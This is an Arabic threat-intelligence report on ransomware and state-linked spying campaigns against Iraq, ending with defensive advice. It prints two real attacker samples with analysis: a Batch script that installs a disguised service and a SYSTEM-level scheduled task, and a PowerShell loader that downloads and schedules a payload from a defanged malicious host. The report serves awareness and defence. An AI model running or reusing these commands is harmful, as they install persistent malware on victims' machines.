مشهد التهديدات السيبرانية في العراق: تحليل هجمات (APTs) المتقدمة وبرمجيات الفدية
يعتمد هذا التقرير على تقارير علنية صادرة عن شركات أمن سيبراني عالمية، وتحليلات تقنية، ومؤشرات تهديد تمت مراجعتها من قبل فريق سومرلينك. لا يهدف التقرير إلى توجيه اتهامات قانونية مباشرة لأي جهة أو دولة أو شركة، وإنما يهدف إلى رفع الوعي الأمني وتسليط الضوء على أنماط التهديدات السيبرانية التي استهدفت المنطقة والعراق خلال السنوات الأخيرة.
الملخص:
تصدر العراق قائمة أكثر عشر دول تعرضاً لبرمجيات الفدية الخبيثة عالمياً على مدار السنوات الماضية وفقاً لتقارير “كاسبرسكي”، وهو تواجد استمر بقوة وصولاً إلى الربع الأول والثاني والثالث من عام 2025. وفي ظل هذا التصاعد الخطير للهجمات السيبرانية، يواجه العراق تهديداً مزدوجاً؛ حيث تشن مجموعات التجسس المتقدمة (APTs) المدعومة من دول مجاورة حملات صامتة لزرع “أبواب خلفية” داخل الوزارات والقطاعات الحساسة، بينما تستغل عصابات الجريمة المنظمة ثغرات الوعي المجتمعي لنشر أحصنة طروادة وبرمجيات الفدية (Ransomware). وعليه، يسلط هذا التقرير الضوء على أساليب الاختراق الحديثة —بدءاً من استغلال الهندسة الاجتماعية والبرامج المقرصنة وصولاً إلى استهداف البنى التحتية للمؤسسات، مقدماً توصيات تقنية وإدارية عاجلة للحد من هذه المخاطر.
مشهد التهديدات في العراق:
تضمنت الاختراقات طرق واسعة من حيث استهداف الأشخاص والشركات والكيانات الحكومية والسفارات ووزارات وموظفي الدولة والبنية التحتية العراقية.
البرمجيات التي استهدفت المنطقة ومن ضمنها العراق هي برمجيات معدلة مثل تطبيق الواتساب الشهير الذي يحتوي على برمجية خبيثة.
أو تطبيقات مثل Signal وTelegram التي تنجح بعض الأحيان بالتسلل إلى متاجر جوجل وسامسونج ستور.
أو برمجيات محمّلة على Google Play بصور متعددة مثل تطبيقات تنظيف الهاتف أو المصباح اليدوي أو برامج الاستثمار أو مدير الملفات وغيرها.
استمرت الألعاب المعدلة أو برمجيات الغش بالانتشار على شكل شفرات خبيثة، وشملت الألعاب فيفا وببجي وروبلكس وماين كرافت.
أغلب الألعاب الموجهة للأطفال والتي تبث إعلانات مستمرة تعتبر قاعدة أساسية لانتشار البرمجيات الخبيثة.
أغلب برامج التجسس للهواتف الذكية هي الأكثر انتشاراً على منصة Android.
برامج الـVPN المنتشرة في المتاجر المجانية، أغلبها تُستخدم كواجهات لجهات ومنظمات استخبارية.
تطبيقات على iOS وAndroid تستهدف المسلمين مثل تطبيقات الأذكار والصلاة وقصص دينية وغيرها.
ملاحظة: ذكرت تقارير استهداف الصين عن طريق مجموعة BadBazaar/APT15 لاستهداف المسلمين الايغور في الصين وأفغانستان وتركيا
وهذا ما يفتح باب الوصول الى منطقتنا العربية والعراق.
تعددت طرق الاستهداف باستخدام مستندات Word تحتوي على أكواد خبيثة لتنزيل برمجيات إضافية.
او وجود ملفات XML غير معتادة تُستخدم لجدولة المهام.
او روابط معينة بداخلها اكواد PHP خبيثة.
او نشر البرمجيات الخبيثة عبر Removable Storage لنقل العدوى بين الأجهزة والشبكات.
يمكن للبرمجيات الخبيثة استخدام وسائط USB للانتشار التلقائي أو شبه التلقائي اعتمادا على نوع البرمجية وسياسات النظام.
هذا ما تم ملاحظته بعد مراجعة قوائم أخرى تتعلق بالتهديدات المحلية اختفاء دول متقدمة كانت متواجدة في قوائم سبق ذكرها.
السبب اعتماد الدول المتقدمة لنقل الملفات والتعامل معها على Cloud Services والشبكات المؤمنة.
وهذا ما يعكس تواجد العراق لمواجهة تهديدات تعتبر بدائية ولكنها مؤثرة داخليا.
اكثر 3 برمجيات خبيثة واحصنة طروادة مؤثرة:
Trojan-Ransom.Win32.Gen
هذا ليس فيروساً واحداً بعينه، بل هو تصنيف (عام Generic) تضعه مضادات الفيروسات للاكواد الخبيثة التي تحمل سلوك برامج الفدية بشكل واضح
Trojan-Ransom.Win32.Wanna
فيروس الفدية الأشهر عالمياً والذي استغل ثغرة EternalBlue. رغم مرور سنوات على ظهوره، الا أنه لا يزال يحقق نسبا عالية جدا وثابتة في جميع القوائم.
Trojan-Ransom.Win32.Crypren
عبارة عن عائلة مشهورة من برامج الفدية التي تركز على تشفير الملفات وتغيير امتداداتها.
اغلب الأدوات التي تمت مهاجمة العراق كانت تنوي:
الوصول والتحكم عن بعد بالجهاز المصاب، تنفيذ أوامر، تحميل/رفع ملفات، الحفاظ على الاستمرارية.
قراءة الرسائل والحصول والاطلاع على سجل المكالمات.
قراءة الرسائل الخاصة ببرامج التواصل كفيسبوك وإنستغرام وتليغرام وسناب وتيك توك وغيرها.
الوصول لمعرض الصور والتقاط سيلفي والوصول الدائم لإحداثيات الموقع.
الانتشار عبر أقراص USB المصابة لنقل العدوى داخل المؤسسات.
البحث عن الملفات المهمة وسرقتها، مراقبة الأقراص القابلة للإزالة والشبكات المحلية.
جمع معلومات النظام وكلمات المرور وتفاصيل نشاط المستخدم على الإنترنت.
إرسال المعلومات إلى خوادم التحكم والسيطرة (C2).
تحليل حالات واقعية:
على سبيل المثال هذا Batch Script لاحد فرق الاستهداف ووجد بأحد برمجيات التجسس التي استهدفت المنطقة والعراق أيضا.
$temp\\dnf4.exe /q /norestart
tasklist
sc qc "WEvMngS"
sc stop "WEvMngS"
sc delete "WEvMngS"
sc create "WEvMngS" binpath= "\"$windir\WEvMngS.exe\" /1" displayname= "Windows Event Manager" type= own start= auto"
sc description "WEvMngS" "Provides event-related methods that register routed events."
sc start "WEvMngS"
schtasks /delete /f /tn "\Microsoft\Windows\Diagnosis\Event Manager"
schtasks /create /f /tn "\Microsoft\Windows\Diagnosis\Event Manager" /xml "$temp\\sch.xml" /ru "NT AUTHORITY\SYSTEM"
sc qc "WEvMngS"
schtasks /query /v /fo list /tn "\Microsoft\Windows\Diagnosis\Event Manager"
tasklist
netstat -aon
ping -n 1 google.com
ipconfig /displaydns
netsh winhttp show proxy
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
التثبيت والتخفي:
امر dnf4.exe /q /norestart: تشغيل ملف تنفيذي بشكل صامت (/q) ودون طلب إعادة تشغيل.
مهمة tasklist يستعرض قائمة البرامج والعمليات المفتوحة حاليا (ربما للتحقق مما إذا كان dnf4.exe قد بدأ العمل بنجاح أو لمعرفة برامج الحماية الموجودة).
إنشاء خدمة وهمية (sc create): يقوم بإنشاء خدمة تسمى WEvMngS ويعطيها اسماً مضللاً هو “Windows Event Manager” لتبدو وكأنها خدمة تابعة لنظام ويندوز.
التشغيل التلقائي (start= auto): يضبط الخدمة لتعمل تلقائياً مع بداية تشغيل الجهاز.
إضافة sc description: وصف مزيف للخدمة لكي لا يشك فيها مدير النظام إذا فحص الخدمات.
الاستمرارية العالية:
إنشاء schtasks /create: مهمة مجدولة (Scheduled Task) مستخدماً ملف XML باسم sch.xml.
أخطر جزئية /ru “NT AUTHORITY\SYSTEM”: حيث يطلب تشغيل المهمة بأعلى صلاحيات في نظام ويندوز (صلاحيات النظام)، مما يعطيه سيطرة كاملة.
بمجرد استقرار الكود، يبدأ بجمع “الغنائم” والمعلومات عن جهازك:
امر netstat -aon: لمعرفة الاتصالات المفتوحة في جهازك ومع من يتواصل الجهاز عبر الإنترنت.
امر ipconfig /displaydns: لمعرفة المواقع والانظمة التي قمت بزيارتها مؤخرا عبر سجلات الـ DNS.
امر reg query …: لاحظ فريق سومرلينك عدم تطرق كاسبرسكي لخلل في الكود او نقص لان ترك المعامل /v دون تحديد اسم القيمة المراد البحث عنها يسبب خطا في تنفيذ السطر.
بعد قراءة الكود وربطه بالاسطر السابقة من الممكن ان الكود ينقصه احد الصيغ ProxyEnable او ProxyServer او AutoConfigURL او ProxyOverride.
وهي قضية أساسية لمعرفة كيفية تمرير المعلومات وما هي العوائق ان وجدت.
الهدف واضح البقاء والاستيطان حتى بعد محاولة إيقاف البرمجية التي تعمل في الخلفية وإضافة وصف رسمي من مايكروسوفت يصعب كشفها ثم التحقق من معلومات الشبكة والتقصي الكامل عن اغلب الأمور المهمة التي تهم المنظمة قبل ان تبدأ بجمع المعلومات الأهم.
وهذا ما يدل على بقاء العراق ضمن هذه القائمة للسنوات الماضية وأهمها 2025 لأن الثغرات التي يستغلها المهاجمون لا تزال موجودة ولم يتم علاجها.
هذا السيناريو تعرضت له إحدى الشركات العملاقة العراقية، والشركات الأجنبية العاملة في العراق.
الجهات والـ APTs:
فريق سومرلينك كان على اطلاع على المنظمات المتواجدة في القوائم لاكثر الجهات فاعلية في فترات متفاوتة داخل Darknet والتليجرام .
Lockbit
Qilin
INC Ransom
Black Basta
8base
Akira
Hunters International
وغيرها من الفرق والمنظمات العالمية.
لم يجد فريق سومرلينك أي تسريب أو استهداف لشركات كبرى ببرمجيات فدية داخل العراق إلا لبعض فرق التجسس العالمية التي سيطرت على خوادم ومواقع لشركات عملاقة أو لكيانات ووزارات حكومية.
منشور سابق لعمليات التتبع التي يقوم بها الفريق.
ملاحظة: بعض المنضمات مثل LockBit تؤجر خدماتها لشركاء اصغر ثم الشركاء هم من يقومون بالحملة حسب الهدف.
—
أكثر من ست مجموعات APT متقدمة مرتبطة بإيران مثل APT34 (OilRig)/APT33 (Elfin)/MuddyWater وغيرها استهدفت المنطقة الخليجية ومصالح عراقية.
من ضمنها شبكة الاتصالات والطيران والنفط والطاقة وتعرضت أيضاً لوزارات الداخلية والخارجية ولبعض الكيانات الحكومية.
آخرها سنة 2026 منذ أشهر استهدفت موظفين لوزارة الخارجية العراقية عبر روابط وهمية انتحلت صفة أعلى وطلبت من موظفين أن يحملوا ملفات وأن ينفذوا أكواد داخل PowerShell لتنفيذ مخطط كامل مع استخدام صفحات مزيفة تدعي أنها دعوات لاجتماع Webex (مخصصة للحكومة).
ثم تهريب البيانات عن طريق ترويسات الـ HTTP إلى خوادم السيطرة C2.
حملة هجومية إيرانية أخرى كانت موجهة ضد الحكومة العراقية باستخدام أدوات مخصصة.
استخدام أنفاق DNS وبريد إلكتروني عبر حسابات مخترقة كقنوات قيادة وتحكم، بالإضافة إلى باب خلفي على خوادم IIS.
القنوات غير التقليدية تهدف إلى تجنب أنظمة كشف الاختراق التقليدية، كجعل مواقع حكومية عراقية تحت سيطرة المهاجم وجعلها خوادم سيطرة C2 كقناة أولية.
وغيرها من الطرق البدائية وغير المعقدة تعتبر للفرق المختصة.
تحليل العينات البرمجية:
مثال صغير لاحد الموظفين قام بنسخ امر PowerShell وتنفيذه داخل حاسوبه.
$di=‘C:\ProgramData\WinWebex’;
md $di 2>“”;
$path=$di+‘\WinWebex.exe’;
Add-Type -A System.Net.Http;
$c=New-Object System.Net.Http.HttpClient;
$c.DefaultRequestHeaders.UserAgent.ParseAdd(‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0’);
[IO.File]::WriteAllBytes($path, $c.GetAsync(‘hxxps://meetingapp[.]site/webexdownload’).Result.Content.ReadAsByteArrayAsync().Result);
$c.Dispose();
Register-ScheduledTask -TaskName winWebex -Action (New-ScheduledTaskAction -Execute $path) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 2) -RepetitionDuration ([TimeSpan]::FromDays(9999))) -Settings (New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Seconds 0)) -Force;
Start-ScheduledTask -TaskName winWebex;
exit
الكود يستخدم اسم WinWebex.exe ومجلد WinWebex لخداع المستخدم أو المحلل الأمني ليعتقد أن هذا الملف يتبع لبرنامج المحادثات الشهير Cisco Webex.
يقوم الكود بإنشاء مجلده داخل C:\ProgramData. وهو مجلد مخفي افتراضياً في الويندوز، ولا يتطلب عادةً صلاحيات مسؤول (Admin) للكتابة فيه.
الكود md $di 2>”” يقوم بإنشاء المجلد، ويستخدم 2>”” لكتم أي رسالة خطأ قد تظهر للمستخدم (مثلاً إذا كان المجلد موجوداً مسبقاً) لضمان تنفيذ الهجوم بصمت تام.
يبدأ بتجاوز الشبكة بتزييف هوية المتصفح (User-Agent Spoofing) الكود لا يطلب تحميل الملف الخبيث بشكل عشوائي، بل يقوم بتعديل رأس الطلب (Header) ليصبح: Mozilla/5.0 … Chrome/137.0.0.0 … Edg/137.0.0.0
هذا يجعل الطلب يبدو أمام جدران الحماية (Firewalls) وأنظمة مراقبة الشبكة وكأنه مستخدم طبيعي يتصفح الإنترنت باستخدام متصفح Microsoft Edge، مما يقلل من احتمالية حظر الرابط.
استدعاء البرمجية الخبيثة من النطاق hxxps://meetingapp[.]site.
استخدام أوامر المهام المجدولة (Scheduled Tasks) في الويندوز لضمان عمل الفيروس بشكل دائم.
Register-ScheduledTask -TaskName winWebex: إنشاء مهمة مجدولة في النظام (winWebex) لتعمل كعملية في الخلفية دون واجهة للمستخدم.
New-ScheduledTaskTrigger: يضبط المؤقت لكي تبدأ البرمجية الخبيثة بالعمل.
الوقت RepetitionDuration ([TimeSpan]::FromDays(9999)): يضمن أن هذه الدورة (العمل كل ساعتين TimeSpan -Hours 2) ستستمر لمدة 9999 يوماً. وهذا الإجراء لا يتم إيقافه إلا بتعديل policy changes أو EDR أو بالفحص الدوري للمؤسسات الحساسة.
تنبيه النظام أن هذه العملية ليس لها حد زمني ExecutionTimeLimit 0.
ثم يقوم بتشغيل العملية فوراً Start-ScheduledTask أي بدون انتظار الـ 5 دقائق التي حددها سابقاً.
هذا اختصار لأحد القضايا التي حصلت داخل مؤسسة حكومية.
اغلب موظفين الكيانات والمؤسسات الحكومية بعد الاختراق او الوصول للأجهزة يتكتمون عن الامر خوفا من الفضيحة او خوفا من المعاقبة ويتم إخفاء عملية الاختراق او الاستهداف بدون اعلام الجهات المختصة، وهذا يسبب ببقاء البرمجيات الخبيثة في خوادم الكيانات الحكومية.
الأسباب:
هنا أحد أهم الأسباب لانتشار البرمجيات الخبيثة Malware بصورها المتعددة هو الاعتماد على النسخ المقرصنة Cracks.
وتعتبر Cracks هو المؤثر الأكبر لبرمجيات الفدية وغيرها للانتشار داخل العراق بالنسبة للأفراد بصورة خاصة.
وجود فايروس مثل WannaCry الذي يعتبر عجوز في أغلب القوائم التي تواجد بها العراق هذا يعني بشكل بحت عن وجود أجهزة تستخدم إصدارات قديمة.
ثقافة المجتمع والأمن السيبراني وتطبيق سياسات الأمان داخل المؤسسات بطيئة جداً.
غياب ثقافة حماية البيانات للفرد العراقي وإيمانه بأهميتها وتحميله للبرامج الضارة والمكركة خير دليل.
غياب الرقابة الأسرية للأطفال واختيارهم الألعاب جعلها بوابة سهلة لتسريب البرمجيات الخبيثة للأجهزة.
انتشار IoT في العراق دون تطبيق أي معايير أساسية للحماية.
الكسل السيبراني الوظيفي والمسؤول الأول عن تحديث البرمجيات المعرضة للاستهداف.
التوقعات:
ينذر القصور التقني والفجوة التكنولوجية الحالية بتوسع رقعة الهجمات مستقبلاً ومن الممكن أن يكون العراق حقل تجارب Testing Ground قبل إطلاق النسخة على أهداف أكبر.
تشكل هذه الهشاشة بيئة خصبة لاستغلال الموارد ضمن شبكات التعدين الخبيث Miners لأسباب متوفرة ذكرنا أغلبها.
“وعلى الرغم من حجم هذه التحديات، تبرز بارقة أمل تتمثل في الصحوة الملحوظة لقطاعي التعليم والأمن السيبراني خلال السنوات الأخيرة، والتي تعكس خطوات تأسيسية مشجعة نحو بناء درع سيبراني وطني أكثر نضجا”.
التوصيات:
يوصي فريق سومرلينك بعد دراسة العديد من الحالات المعلنة (وغير المعلنة في هذا البحث “ليس بصدد استعراض المعلومات”).
الافراد والمسؤولين:
التعامل بحذر مع أي ملف RAR أو ZIP أو PDF الخ من مصادر خارجية، خاصةً ما يحمل أسماء تتعلق بوثائق حكومية.
توخي الحذر من أي بريد إلكتروني أو رابط يدّعي أنه من وزارة أو جهة حكومية، والتحقق من مصدره قبل فتح أي مرفق أو رابط. تجنب فتح الروابط أو النماذج التي تصل عبر البريد الإلكتروني من مصادر غير موثوقة.
عدم تنفيذ أوامر PowerShell أو تنصيب أو تشغيل البرمجيات مطلقاً بناءً على طلب من مواقع ويب أو رسائل إلكترونية غير موثوقة.
الوعي بهجمات ClickFix حيث تطلب منك نسخ ولصق كود لإكمال إجراء ما (مثال: “انسخ والصق هذا الأمر لتثبيت تحديث أمان”).
امن الهواتف iPhone ونقاط مهمة للاشخاص ذو المناصب الحساسة:
تعطيل iMessage و FaceTime كبداية.
إغلاق خاصية iCloud Web Access.
تفعيل Lockdown الخاصية التي وفرتها Apple.
إعادة تشغيل الجهاز يومياً مرتين أو 3 مهم لو في حال وجود برمجيات تجسس داخل الـ RAM حتى لو عادت من جديد.
توقف عن شحن هاتفك من خلال USB لو كنت كثير التنقل بين المطارات أو استخدم USB Data Blocker.
إيقاف AirDrop و Bluetooth من خلال الإعدادات الداخلية نفسها للخدمة.
استخدام مفاتيح أمان مادية مثل YubiKey لزيادة طبقات الحماية.
لا تنصح سومرلينك باستخدام الـ VPN المجانية والمدفوعة مثل ExpressVPN وCyberGhost وغيرها الكثير والمجهولة المصدر كون أغلبها أصبحت بيد جهات استخبارية أو إسرائيلية وما تبقى منها يتم شراء معلوماتها بمبالغ معينة. تنصح باستخدام KasperSkyVPN أو ProtonVPN وغيرها من الخدمات الموثوقة.
ملاحظة: جهاز الامن الفيدرالي الروسي اتهم في سنة 2023 عن تعاون ابل مع أجهزة الاستخبارات الامريكية بعمليات التجسس وزرع backdoors
في هواتف ايفون تستخدم للتجسس والتنصت وسرقة المعلومات, وهذا ما رفضته ابل بشدة واتهم المحللون برمجية Pegasus وقتها وليس backdoors.
ملاحظة: هاتف محمول من شركة Bittium الفنلندية يحتوي على عدة طبقات حماية وتشفير و vpn مختص ونظامين سري للأعمال وللاستخدام الشخصي بديل ناجح.
الفرق الفنية وأمن المعلومات:
تعزيز حماية البنية التحتية وفرض سياسات صارمة على الخوادم العامة والتأكد من خلوها من الثغرات.
استخدام قوائم التحكم بالدخول (ACLs) وجدران الحماية التطبيقية (WAF) لمنع الاستغلال مع تطبيق WDAC.
منع تشغيل PowerShell و CMD بالكامل للمستخدمين العاديين وحتى الإداريين إلا للفرق الفنية المختصة.
مراقبة العمليات غير المعتادة مثل تحميل DLLs بواسطة تطبيقات شرعية (مثل VLC.exe).
تفعيل أنظمة فلترة متقدمة للبريد الإلكتروني تمنع وصول رسائل انتحال الهوية، خاصةً تلك التي تحمل تهديدات من نوع ClickFix.
التأكد من تفعيل الفلاتر التي تمنع وصول رسائل البريد الإلكتروني التي تحتوي على روابط لمواقع غير معروفة أو نماذج Google Forms مشبوهة أو حتى ملفات للتحميل وعزلها للفحص قبل الوصول للجهة المطلوبة.
استخدام تقنيات الإدارة مثل AppLocker وغيرها لتقييد تنفيذ البرامج إلى المسارات المعروفة والموثوقة فقط، مما يصعب على المهاجم استغلال تقنيات الـ DLL Sideloading.
إضافة تقنية EDR لمتابعة التعديلات على الريجستري وغيرها.
تقييد استخدام الفلاشات USB والأجهزة الخارجية والانتقال إلى استخدام Cloud Services موثوقة بشكل كامل مع “التكوين الصحيح” لها.
متابعة أحدث مؤشرات الاختراق (IOCs) من المصادر الموثوقة وتحديث أنظمة الكشف (مثل IDS/IPS) بها.
أي تعارض مستقبلي للتقنيات المتداخلة يمكن حلها عن طريق فرق فنية مختصة.
توصية أخيرة للشركات الخاصة والقطاع المصرفي:
“تدريب الموظفين”.
التنسيق والتعاون الفعال بين الشركات الخاصة والمؤسسات الحكومية لتطوير وحماية البنى التحتية العراقية.
اعتماد بنية Zero Trust داخل المؤسسات الحساسة.
وضع خطة واضحة للاستجابة للحوادث السيبراني مع نقاط تحمي “الموظف” وتشجيع ثقافة الإبلاغ بدل الخوف.
ضرورة اختبار الاختراق الدوري من فرق داخلية أو خارجية لتقييم الوضع الفعلي، وليس فقط التحديث النظري.
الخلاصة
“إن تحليل مشهد التهديدات السيبرانية في العراق يضعنا أمام مفارقة خطيرة، فالحكومة العراقية تمتلك رؤية استراتيجية واضحة متمثلة في “استراتيجية الامن السيبراني 2022-2027″، وتمتلك إطارا تنظيميا صارما متمثلا في “وثيقة السياسات والمعايير لأمن المعلومات 2020”. هذه الوثائق منعت صراحة استخدام البرامج المقرصنة (الكراكات)، وفرضت الإبلاغ الفوري عن الحوادث، ووضعت مبدأ “الامتيازات الدنيا” للموظفين.
ومع ذلك، يثبت هذا التحقيق أن المشكلة الحقيقية تكمن في “غياب الامتثال” (Non-Compliance). إن استمرار التكتم على الاختراقات في الوزارات، واستباحة استخدام أقراص الـ USB، وتنصيب برمجيات غير موثوقة على أجهزة المؤسسة لمشاهدة “مباريات كرة القدم”، ومنح صلاحيات ادارية (Admin/PowerShell) لموظفين غير مختصين، هي انتهاكات صريحة للسياسات الحكومية المقرة. وعليه، فإن خط الدفاع الأول لا يتطلب استيراد تكنولوجيا جديدة فحسب، بل يتطلب تفعيل سلطة “التدقيق والمحاسبة” لإجبار المؤسسات على تطبيق قوانين الامن السيبراني العراقية التي كتبت بالفعل ولكنها لم تفعل بالشكل الكافي على أرض الواقع.”
فريق سومرلينك
12.5.2026
المراجع:
http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439739%40fsbMessage.html اتهام روسيا لشركة ابل.
https://www.lookout.com/threat-intelligence/article/badbazaar-surveillanceware-apt15 حول استهداف الصين لمجتمع المسلمين.
https://www.zscaler.com/blogs/security-research/dust-specter-apt-targets-government-officials-iraq تقارير لاستهداف ايران للكيانات الحكومية العراقية.
https://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government استهداف ايران للبنية التحتية العراقية.
https://www.welivesecurity.com/en/eset-research/bladedfeline-whispering-dark استهداف ايران للحكومة العراقية وحكومة إقليم كردستان.
تقرير eset الربع الثاني والثالث لسنة 2025 حول تطبيق اندرويد تجسسي ولوحة تحكم بشعار الامن الوطني العراقي.
https://securelist.com/goldenjackal-apt-group/109677 تقرير كاسبرسكي عن منظمة goldenjackal.
https://securelist.com/malware-report-q1-2025-pc-iot-statistics/116686 تقرير Kaspersky الربع الأول 2025.
https://securelist.com/malware-report-q2-2025-pc-iot-statistics/117421 تقرير Kaspersky الربع الثاني 2025.
https://securelist.com/malware-report-q3-2025-pc-iot-statistics/118020 تقرير كاسبرسكي الربع الثالث 2025.
https://securelist.com/mobile-threat-report-2022/108844 تقرير كاسبرسكي يخص الهواتف المحمولة 2022.
https://securelist.com/mobile-malware-evolution-2021/105876 تقرير كاسبرسكي يخص الهواتف المحمولة 2021.
https://www.ncc.gov.iq/files/%D8%A7%D9%84%D8%B3%D9%8A%D8%A7%D8%B3%D8%A7%D8%AA%20%D9%88%D8%A7%D9%84%D9%85%D8%B9%D8%A7%D9%8A%D9%8A%D8%B1.pdf السياسات والمعايير لأمن المعلومات ومشاركة البيانات.
الاستراتيجية الامن السيبراني العراقي.
https://www.bittium.com/defense-security/bittium-tough-mobile-3/ هاتف شركة BITTIUM المشفر.
